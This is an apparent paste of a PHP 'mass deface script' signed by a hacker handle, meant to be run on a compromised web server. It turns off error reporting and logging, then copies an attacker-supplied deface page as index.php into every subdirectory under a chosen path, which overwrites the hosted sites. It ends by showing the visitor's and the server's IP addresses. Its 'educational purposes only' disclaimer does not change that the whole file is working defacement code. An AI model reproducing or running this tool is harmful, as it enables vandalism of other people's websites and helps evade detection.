
mass deface script

Apr 6th, 2018
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  1. <title>Mass Deface Script</title>
  2. <center><font color="white" face="Orbitron"><b>Mass Defacement</td></b></center>
  3. <?php
  4. /*
  5. Script: Mass Deface Script Tool
  6. Disclaimer:
  7. This script is for Research/Educational/Academic purposes only,
  8. The Author of this script takes no responsibility for the way
  9. you use this script, you are responsible for your own actions.
  10. */
  11. @session_start();
  12. @error_reporting(0);
  13. @ini_set('error_log',NULL);
  14. @ini_set('display_errors',0);
  15. @ini_set('log_errors',0);
  16. @ini_set('max_execution_time',0);
  17. @set_time_limit(0);
  18. echo "<center><textarea rows='10' cols='100'>";
  19. $defaceurl = $_POST['massdefaceurl'];
  20. $dir = $_POST['massdefacedir'];
  21. echo $dir."\n";
  23. if (is_dir($dir)) {
  24. if ($dh = opendir($dir)) {
  25. while (($file = readdir($dh)) !== false) {
  26. if(filetype($dir.$file)=="dir"){
  27. $newfile=$dir.$file."/index.php";
  28. echo $newfile."\n";
  29. if (!copy($defaceurl, $newfile)) {
  30. echo "failed to copy $file...\n";
  31. }
  32. }
  33. }
  34. closedir($dh);
  35. }
  36. }
  37. echo "</textarea></center>";
  38. ?>
  39. <center>
  40. <font color="white">
  41. <body bgcolor="#000000">
  42. <font face="Iceland">
  43. <br>
  44. <form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
  45. [+] Main Directory: <input type='text' style='width: 250px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'>
  46. <br><br>
  47. [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
  48. <br>
  49. <br>
  50. <input type='submit' name='execmassdeface' value='Execute'></form></td>
  51. </center>
  54. <br><br><br>
  55. <font size="5"><center>
  56. This script is for Research/Educational/Academic purposes only, <br>
  57. Defacement Url = URL of your deface page (e.g: )<br><br>
  58. </body></html>
  59. <center><font face="Iceland"><b>Rec0ded by .::U7TiM4T3_H4x0R::.</b></center>
  61. <center>
  62. <?php
  63. $ip = $_SERVER['REMOTE_ADDR'];
  64. echo "Your IP : " . $ip;
  65. ?>
  66. <font> | </font>
  67. <?php
  68. $server = $_SERVER['SERVER_ADDR'];
  69. echo "Server IP : " . $server;
  70. ?>
  71. </center>
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